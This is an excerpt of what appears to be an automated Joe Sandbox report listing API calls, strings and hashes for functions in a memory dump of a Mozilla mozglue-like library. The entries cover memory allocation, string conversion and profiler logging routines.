                                                                  • Opcode ID: c23e990b30420711f894265d17a2a229969e29b9d0e5b29b60546efa45618fd7
                                                                  • Instruction ID: 31c5a1bd578424363ca476a65ef5910a25f8fa1fc2cc0fba5635b3ed967fcb92
                                                                  • Opcode Fuzzy Hash: c23e990b30420711f894265d17a2a229969e29b9d0e5b29b60546efa45618fd7
                                                                  • Instruction Fuzzy Hash: 3A419C317002049FCB04DF66C8DCAAEB7F5EF89318F644568E50A9B791EB34A805CF69
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C5F31A7), ref: 6C62CDDD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                  • API String ID: 4275171209-2186867486
                                                                  • Opcode ID: 1a5250017e522772f1f8719f1d137961808a6ebf5a52fa974f11f5fbf70d10fe
                                                                  • Instruction ID: 2e7dc10f049cd96ea7826fba8e728e1e5950c9864ac01a13c870de65d0104777
                                                                  • Opcode Fuzzy Hash: 1a5250017e522772f1f8719f1d137961808a6ebf5a52fa974f11f5fbf70d10fe
                                                                  • Instruction Fuzzy Hash: 7F310730740215ABFB24AF658C45BAE7775AF81B18F204414F516ABAC0DB78D401CFAD
                                                                  APIs
                                                                    • Part of subcall function 6C5FF100: LoadLibraryW.KERNEL32(shell32,?,6C66D020), ref: 6C5FF122
                                                                    • Part of subcall function 6C5FF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C5FF132
                                                                  • moz_xmalloc.MOZGLUE(00000012), ref: 6C5FED50
                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5FEDAC
                                                                  • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C5FEDCC
                                                                  • CreateFileW.KERNEL32 ref: 6C5FEE08
                                                                  • free.MOZGLUE(00000000), ref: 6C5FEE27
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C5FEE32
                                                                    • Part of subcall function 6C5FEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C5FEBB5
                                                                    • Part of subcall function 6C5FEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C62D7F3), ref: 6C5FEBC3
                                                                    • Part of subcall function 6C5FEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C62D7F3), ref: 6C5FEBD6
                                                                  Strings
                                                                  • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C5FEDC1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                  • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                  • API String ID: 1980384892-344433685
                                                                  • Opcode ID: 18485494fb9b5908aced796c52143894894af64b4f28d3c7a77c2867d4192e66
                                                                  • Instruction ID: a5b04d97232c3cd3e89959e1c75a43e8517b630017ef5685c52983cf70541103
                                                                  • Opcode Fuzzy Hash: 18485494fb9b5908aced796c52143894894af64b4f28d3c7a77c2867d4192e66
                                                                  • Instruction Fuzzy Hash: EC51F471D052048FDB08DF69DC406EEB7B1AF4A318F04892DD8616BB40E770694ACBE6
                                                                  APIs
                                                                  • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C66A565
                                                                    • Part of subcall function 6C66A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C66A4BE
                                                                    • Part of subcall function 6C66A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C66A4D6
                                                                  • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C66A65B
                                                                  • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C66A6B6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                  • String ID: 0$z
                                                                  • API String ID: 310210123-2584888582
                                                                  • Opcode ID: d355f518fcda6129d99dbe88b9c943ca7c045f7c76cbf9a2f0ff6aef94d050ee
                                                                  • Instruction ID: 0a538dc1e908270b4fa36b9ae62ee60b7968bc2fa0895016c6608e9541b382cc
                                                                  • Opcode Fuzzy Hash: d355f518fcda6129d99dbe88b9c943ca7c045f7c76cbf9a2f0ff6aef94d050ee
                                                                  • Instruction Fuzzy Hash: 9B4138719087459FC341DF29C480A8ABBE5BF89354F408A2EF49987651E730E549CB97
                                                                  APIs
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C63945E
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639470
                                                                    • Part of subcall function 6C639420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639482
                                                                    • Part of subcall function 6C639420: __Init_thread_footer.LIBCMT ref: 6C63949F
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63DF7D
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63DF8A
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C67F4B8), ref: 6C63DFC9
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C63DFF7
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C63E000
                                                                  Strings
                                                                  • <none>, xrefs: 6C63DFD7
                                                                  • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C63E00E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpid
                                                                  • String ID: <none>$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                  • API String ID: 1430161788-1978395012
                                                                  • Opcode ID: 13f77c8d648f0780213e993d57fa24986c1d8b40c9834db381a02ac1f8bc6312
                                                                  • Instruction ID: 6e59c23c95cbd06155689d8793b3f4a537969557e8a0dc04087bd00d2dedb094
                                                                  • Opcode Fuzzy Hash: 13f77c8d648f0780213e993d57fa24986c1d8b40c9834db381a02ac1f8bc6312
                                                                  • Instruction Fuzzy Hash: 3E11C1316012319BDB159F59C8889AE7775FF8634CF101819EA0957706C7319811CFBE
                                                                  APIs
                                                                    • Part of subcall function 6C62AB89: EnterCriticalSection.KERNEL32(6C67E370,?,?,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284), ref: 6C62AB94
                                                                    • Part of subcall function 6C62AB89: LeaveCriticalSection.KERNEL32(6C67E370,?,6C5F34DE,6C67F6CC,?,?,?,?,?,?,?,6C5F3284,?,?,6C6156F6), ref: 6C62ABD1
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C63945E
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639470
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C62F710,?,00000039,00000000,?,6C64138F,?,?,?), ref: 6C639482
                                                                  • __Init_thread_footer.LIBCMT ref: 6C63949F
                                                                  Strings
                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C63947D
                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C639459
                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C63946B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                  • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                  • API String ID: 4042361484-1628757462
                                                                  • Opcode ID: 00ebcf3e4e17ec0e4b2cdf14cbdeab766bc2ccee38dc92d8ffc5045a67cc4b15
                                                                  • Instruction ID: 70ad84ca59e17552c295066bf973e9d293889a728262a4586cfed211cbec270c
                                                                  • Opcode Fuzzy Hash: 00ebcf3e4e17ec0e4b2cdf14cbdeab766bc2ccee38dc92d8ffc5045a67cc4b15
                                                                  • Instruction Fuzzy Hash: C001F530A001218BD714DB6ED954A893274AF0632DF041D37D90EC6A43EA26D4648EBF
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C640F6B
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C640F88
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C640FF7
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C641067
                                                                  • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C6410A7
                                                                  • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C64114B
                                                                    • Part of subcall function 6C638AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C6412F7), ref: 6C638BD5
                                                                  • free.MOZGLUE(?), ref: 6C641174
                                                                  • free.MOZGLUE(?), ref: 6C641186
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                  • String ID:
                                                                  • API String ID: 2803333873-0
                                                                  • Opcode ID: 1826d02da308be9440e08e11cf83e0c896aa96edbf11cf1dc74503d4fb2bae30
                                                                  • Instruction ID: d5466b7aac09eaedcb8c791e816f611657290b3ff9b1f14da43fce649baf12f9
                                                                  • Opcode Fuzzy Hash: 1826d02da308be9440e08e11cf83e0c896aa96edbf11cf1dc74503d4fb2bae30
                                                                  • Instruction Fuzzy Hash: FA61B075A043409BDB11CF25C880B9AB7F5BFD6308F14C91DE98947B12EB31E859CB9A
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(?,?,?,?,6C5FB61E,?,?,?,?,?,00000000), ref: 6C5FB6AC
                                                                    • Part of subcall function 6C60CA10: malloc.MOZGLUE(?), ref: 6C60CA26
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C5FB61E,?,?,?,?,?,00000000), ref: 6C5FB6D1
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C5FB61E,?,?,?,?,?,00000000), ref: 6C5FB6E3
                                                                  • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C5FB61E,?,?,?,?,?,00000000), ref: 6C5FB70B
                                                                  • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C5FB61E,?,?,?,?,?,00000000), ref: 6C5FB71D
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C5FB61E), ref: 6C5FB73F
                                                                  • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C5FB61E,?,?,?,?,?,00000000), ref: 6C5FB760
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C5FB61E,?,?,?,?,?,00000000), ref: 6C5FB79A
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                  • String ID:
                                                                  • API String ID: 1394714614-0
                                                                  • Opcode ID: 4e0ba86b27fc664077a017f16994341a24367068560a34519db5ae90b9fbfb26
                                                                  • Instruction ID: c7322d0b6d907ad3c582002fa99ac24d340fa65a3f8eb662f7375479df11a048
                                                                  • Opcode Fuzzy Hash: 4e0ba86b27fc664077a017f16994341a24367068560a34519db5ae90b9fbfb26
                                                                  • Instruction Fuzzy Hash: A241B4B2D00115DFCB08EF68DC806AFB7B5BB45324F250A29E825E7780E731A9058BE5
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(6C675104), ref: 6C5FEFAC
                                                                  • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C5FEFD7
                                                                  • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5FEFEC
                                                                  • free.MOZGLUE(?), ref: 6C5FF00C
                                                                  • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C5FF02E
                                                                  • memcpy.VCRUNTIME140(00000000,?), ref: 6C5FF041
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C5FF065
                                                                  • moz_xmalloc.MOZGLUE ref: 6C5FF072
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                  • String ID:
                                                                  • API String ID: 1148890222-0
                                                                  • Opcode ID: 5c70652234520ef64531ed8c643a37b5819b7d2e7f15902070005fad3158fe5e
                                                                  • Instruction ID: 79d9dc7f3edc79eeb34c2453a58c0581c1b5e900bd58ddf2c9b685316cbe8d20
                                                                  • Opcode Fuzzy Hash: 5c70652234520ef64531ed8c643a37b5819b7d2e7f15902070005fad3158fe5e
                                                                  • Instruction Fuzzy Hash: 5B41F8B1A001059FCB08CF68DC809AF77A9AF85314B244728E926D7794EB71E905CBE5
                                                                  APIs
                                                                  • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C66B5B9
                                                                  • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C66B5C5
                                                                  • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C66B5DA
                                                                  • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C66B5F4
                                                                  • __Init_thread_footer.LIBCMT ref: 6C66B605
                                                                  • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C66B61F
                                                                  • std::_Facet_Register.LIBCPMT ref: 6C66B631
                                                                  • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C66B655
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                  • String ID:
                                                                  • API String ID: 1276798925-0
                                                                  • Opcode ID: e0af3bfe7d1b295629769b63207dff37cadfa39061e5bbc13a7c15cacf425345
                                                                  • Instruction ID: af29ffeded171bea1f907de4def52a12dd00a44ac3ff491584ac6ddb5b425814
                                                                  • Opcode Fuzzy Hash: e0af3bfe7d1b295629769b63207dff37cadfa39061e5bbc13a7c15cacf425345
                                                                  • Instruction Fuzzy Hash: 3B317271B00114CBCB059F6AC9989AEB7F5FFCA325F140919E90297740DB34A806CFAE
                                                                  APIs
                                                                    • Part of subcall function 6C62FA80: GetCurrentThreadId.KERNEL32 ref: 6C62FA8D
                                                                    • Part of subcall function 6C62FA80: AcquireSRWLockExclusive.KERNEL32(6C67F448,?,6C62FA1F,?,?,6C605407), ref: 6C62FA99
                                                                  • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C636727
                                                                  • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C6367C8
                                                                    • Part of subcall function 6C644290: memcpy.VCRUNTIME140(?,?,?,:dl,?,:dl,00000001,?,6C643AED,?,00000001), ref: 6C6442C4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                  • String ID: data$vgl
                                                                  • API String ID: 511789754-1010661664
                                                                  • Opcode ID: 6fa73c3d5bf562275e0eb5839dd08cfda0f639ac241e737976ed597eefa10604
                                                                  • Instruction ID: ffa9b241ae34462ed7624bba3e1a14a50bca85bd105dfc3eb487372e3816c059
                                                                  • Opcode Fuzzy Hash: 6fa73c3d5bf562275e0eb5839dd08cfda0f639ac241e737976ed597eefa10604
                                                                  • Instruction Fuzzy Hash: 06D1BF75A083408FD724CF25C841B9ABBE5BFC6308F20992DE48987B51DB31D849CB5B
                                                                  APIs
                                                                  • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C5FEB57,?,?,?,?,?,?,?,?,?), ref: 6C62D652
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C5FEB57,?), ref: 6C62D660
                                                                  • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C5FEB57,?), ref: 6C62D673
                                                                  • free.MOZGLUE(?), ref: 6C62D888
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$memsetmoz_xmalloc
                                                                  • String ID: W_l$|Enabled
                                                                  • API String ID: 4142949111-4144283391
                                                                  • Opcode ID: 401bff7ad8b2e67752e8c035e0aec832f40226bc87903bf43ad5596a9b261589
                                                                  • Instruction ID: 72d1252a06e2f5a5e8d00a13a42150a0b44ca2d15ad4eb06467a72b8015d9d85
                                                                  • Opcode Fuzzy Hash: 401bff7ad8b2e67752e8c035e0aec832f40226bc87903bf43ad5596a9b261589
                                                                  • Instruction Fuzzy Hash: EBA102B0A042149FDB15CF69C490BEEBBF1EF4A318F14845CD899AB741D738A845CFA9
                                                                  APIs
                                                                  • free.MOZGLUE(?,?,?,6C657ABE), ref: 6C60985B
                                                                  • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C657ABE), ref: 6C6098A8
                                                                  • moz_xmalloc.MOZGLUE(00000020), ref: 6C609909
                                                                  • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C609918
                                                                  • free.MOZGLUE(?), ref: 6C609975
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868864847.000000006C682000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c5f0000_file.jbxd
                                                                  Similarity
                                                                  • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                  • String ID:
                                                                  • API String ID: 1281542009-0
                                                                  • Opcode ID: 2aa7779f6ce236684f4c6ec756c1d2d489eae76a35de5061903e2e035f138cb5
                                                                  • Instruction ID: f0406a3010d927fe12342ac19a2b6576129c3c3bb398f6e33ecdaebfee5ec291
                                                                  • Opcode Fuzzy Hash: 2aa7779f6ce236684f4c6ec756c1d2d489eae76a35de5061903e2e035f138cb5
                                                                  • Instruction Fuzzy Hash: 7D71AC74604B058FC729CF28C580956B7F2FF4A3287284AADE85A9BB90D771F841CF95
                                                                  APIs
                                                                  • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C64CC83,?,?,?,?,?,?,?,?,?,6C64BCAE,?,?,6C63DC2C), ref: 6C60B7E6
                                                                  • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C64CC83,?,?,?,?,?,?,?,?,?,6C64BCAE,?,?,6C63DC2C), ref: 6C60B80C
                                                                  • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C64CC83,?,?,?,?,?,?,?,?,?,6C64BCAE), ref: 6C60B88E
                                                                  • ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,6C64CC83,?,?,?,?,?,?,?,?,?,6C64BCAE,?,?,6C63DC2C), ref: 6C60B896
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1868758897.000000006C5F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1868735691.000000006C5F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868818190.000000006C66D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1868842850.000000006C67E000.00000004.00000001.01000000.00000008.sdmpDownload File
